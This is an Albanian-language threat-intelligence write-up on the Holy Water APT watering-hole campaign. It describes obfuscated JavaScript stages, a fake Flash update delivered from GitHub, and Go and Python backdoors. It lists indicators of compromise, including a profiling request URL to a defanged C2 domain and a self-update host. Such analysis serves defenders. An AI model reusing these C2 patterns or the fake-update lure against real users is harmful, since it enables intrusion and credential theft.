Uji i Shenjtë APT

Holy Water APT është emri që i është dhënë një grupi kriminelësh kibernetikë që kryen një seri sulmesh të llojit të ujit kundër një grupi fetar dhe etnik aziatik. TTP (Taktika, Teknika dhe Procedurat) e këtij sulmi të veçantë nuk mund t'i atribuohet asnjë prej aktorëve tashmë të njohur të ATP (Kërcënimi i vazhdueshëm i avancuar), gjë që i çoi studiuesit në përfundimin se ky është një grup i ri kriminal kibernetik që shfaq karakteristikat e një ekip i vogël dhe fleksibël hakerash.

Për të kryer një sulm në vrima uji, kriminelët synojnë disa faqe interneti që vizitohen shpesh nga objektivat e përcaktuara. Faqet mund t'i përkasin organizatave, bamirësive ose individëve me ndikim që i përkasin grupit të synuar. Të gjitha faqet e internetit të komprometuara nga Uji i Shenjtë u pritën në të njëjtin server dhe përfshinin një personalitet fetar, bamirësi, program shërbimi vullnetar dhe një organizatë të tregtisë së drejtë, ndër të tjera.

Sulmi përfshinte disa faza

Me të vizituar një faqe interneti të komprometuar, përdoruesi hyn në fazën e parë të sulmit që përbëhet nga një JavaScript i korruptuar i quajtur (script|jquery)-css.js dhe i turbulluar me Sojson, një shërbim ueb me bazë kineze. Roli i këtij skripti është të përcaktojë nëse përdoruesi është një objektiv i vlefshëm dhe për ta bërë këtë ngarkesa fillon të grumbullojë të dhëna mbi vizitorin dhe t'i dërgojë ato në një server të jashtëm në loginwebmailnic.dynssl[.]com përmes kërkesave HTTP GET:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

Përgjigja nga serveri kthen një rezultat të vërtetë ose të rremë, dhe nëse vlera është e vërtetë, hapet faza tjetër e sulmit; përndryshe, asgjë nuk ndodh.

Gjatë hapit të dytë, një JavaScript me emrin (script|jquery)-file.js, i cili është, edhe një herë, i turbullt në të njëjtën mënyrë. Megjithatë, këtë herë hakerët përdorën Sojson v5 në vend të v4. Për të infektuar përdoruesin, Holy Water APT nuk shfrytëzon asnjë dobësi ose dobësi të softuerit. Në vend të kësaj, krijohet një dritare kërcyese që ofron një përditësim të Flash player-it dhe viktima e mundshme duhet të pranojë të shkarkojë skedarin.

Arsenali i Mjeteve Malware të Holy Water APT u organizua në GitHub

Nëse përdoruesi lejon që përditësimi i rremë Flash të vazhdojë, ai lidhet me një depo jo më aktive të GitHub që ndodhet në github.com/AdobeFlash32/FlashUpdate . Katër grupe të ndryshme veglash u ruajtën në atë vend - një paketë instaluesi, një malware me derë të pasme të emërtuar nga studiuesit Godlike12 dhe dy versione të një dere të pasme Python me burim të hapur të njohur si Stitch , që u modifikuan nga hakerat me funksionalitet të zgjeruar. Paketa e përditësimit është një instalues NSIS që lëshon një instalues legjitim të Windows Flash Player dhe një mjet stater që përdoret për të ngarkuar ngarkesën aktuale. Backdoor Godlike12 është shkruar në gjuhën Go dhe përdoret për të zbatuar një kanal Google Drive në serverët e Komandës dhe Kontrollit (C&C, C2). Sa i përket varianteve Stitch backdoor, përveç aktiviteteve të zakonshme në backdoor, si mbledhja e informacionit dhe fjalëkalimit, regjistrimi i aktiviteteve, shkarkimi i skedarëve, etj., grupi i Ujit të Shenjtë shtoi mundësinë për të shkarkuar një program legjitim të instalimit të Adobe Flash, për ta përditësuar automatikisht veten nga ubntrooters.serveuser.com dhe arrini këmbëngulje duke shfrytëzuar detyrat e planifikuara.